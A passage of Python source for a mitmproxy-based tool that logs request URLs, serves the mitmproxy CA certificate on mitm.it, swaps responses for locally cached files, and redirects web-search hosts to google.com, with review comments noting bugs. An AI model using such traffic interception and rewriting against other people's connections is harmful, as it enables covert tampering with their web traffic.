                "Reason: This websearch is blocked, try http://google.com")
            flow.reply(resp)
    # Method 2: Redirect the request to a different server
    # NOTE(review): this redirect runs regardless of the SN flag — confirm it
    # should not be guarded by `if (SN)` like the block above.
    if flow.request.pretty_host(hostheader=True).endswith(tuple(web_searchs)):
        flow.request.host = "google.com"
        flow.request.update_host_header()
def handle_request(self, msg):
    # FlowMaster hook (double-quoted tamper-files variant): logs every request
    # URL, serves the mitmproxy CA-certificate mini site on mitm.it, and
    # answers URLs matching an enabled proxy rule from the local cache.
    f = flow.FlowMaster.handle_request(self, msg)
    fullURL = f.request.scheme + "://" + f.request.host
    # Append the port only when it is not the scheme default.
    if (f.request.scheme == "http" and f.request.port == 80) == False and (
        f.request.scheme == "https" and f.request.port == 443
    ) == False:
        fullURL = fullURL + ":" + str(f.request.port)
    fullURL = fullURL + f.request.path
    send_message(json.dumps({"method": "log", "message": fullURL}))
    if f.request.host == "mitm.it":
        # Serve the bundled certificate-install pages ourselves.
        path = f.request.path
        if path.find("?") > -1:
            path = path[: path.find("?")]
        if path == "/":
            path = "/index.html"
        mimeType = ""
        if path.rfind(".") > -1:
            extension = path[path.rfind(".") + 1 :]
            if extension == "html":
                mimeType = "text/html"
            elif extension == "css":
                mimeType = "text/css"
            elif extension == "cer":
                mimeType = "application/pkix-cert"
            elif extension == "pem":
                mimeType = "application/x-pem-file"
            elif extension == "p12":
                mimeType = "application/x-pkcs12"
        responseHeaders = ODictCaseless([("content-type", mimeType)])
        try:
            if path in ["/mitmproxy-ca-cert.cer", "/mitmproxy-ca-cert.pem",
                        "/mitmproxy-ca-cert.p12"]:
                with open(expanduser("~/.mitmproxy" + path), "rb") as certfile:
                    content = certfile.read()
            elif path in ["/index.html", "/mitmproxy.css"]:
                with open(sys.prefix + "/tamper-files" + path, "rb") as uifile:
                    content = uifile.read()
            responseHeaders["Content-Length"] = [len(content)]
            resp = HTTPResponse([1, 1], 200, "OK", responseHeaders, content)
            msg.reply(resp)
        except:
            # NOTE(review): bare except also masks the NameError raised when
            # `content` was never assigned (unknown path) — any failure 404s.
            resp = HTTPResponse([1, 1], 404, "Not Found", ODictCaseless([]), "")
            msg.reply(resp)
    for url in urlsToProxy:
        # Rule URLs may contain '*' wildcards; translate to a regex.
        regexURL = "^" + re.escape(url["url"]).replace("\\*", ".*?") + "$"
        if re.match(regexURL, fullURL) and url["isEnabled"] == True:
            send_message(
                json.dumps({"method": "log", "message": "Serving cached file (" + url["cachedFilename"] + ")"})
            )
            localFile = open(self._cachedFilesPath + url["cachedFilename"], "r")
            content = localFile.read()
            localFile.close()
            responseHeaders = []
            hasViaHeader = False
            # Copy the recorded headers, dropping content-encoding (the cached
            # body is stored decoded) and tagging the Via header.
            for header in url["responseHeaders"]:
                if header["name"].lower() != "content-encoding":
                    if header["name"].lower() == "via":
                        hasViaHeader = True
                        if header["value"].find("tamper") == -1:
                            header["value"] += ", tamper"
                    responseHeaders.append((str(header["name"]), str(header["value"])))
            if not hasViaHeader:
                responseHeaders.append(["via", "tamper"])
            # Force revalidation so the client never caches the tampered copy.
            responseHeaders.append(["Cache-Control", "no-cache, no-store, must-revalidate"])
            responseHeaders.append(["Pragma", "no-cache"])
            responseHeaders.append(["Expires", "0"])
            resp = HTTPResponse([1, 1], 200, "OK", ODictCaseless(responseHeaders), content)
            msg.reply(resp)
            break
    if "Accept-Encoding" in f.request.headers:
        f.request.headers["Accept-Encoding"] = ["none"]
    # NOTE(review): when a branch above already replied, this replies a
    # second time — confirm msg.reply tolerates that in this mitmproxy version.
    if f:
        msg.reply()
    return f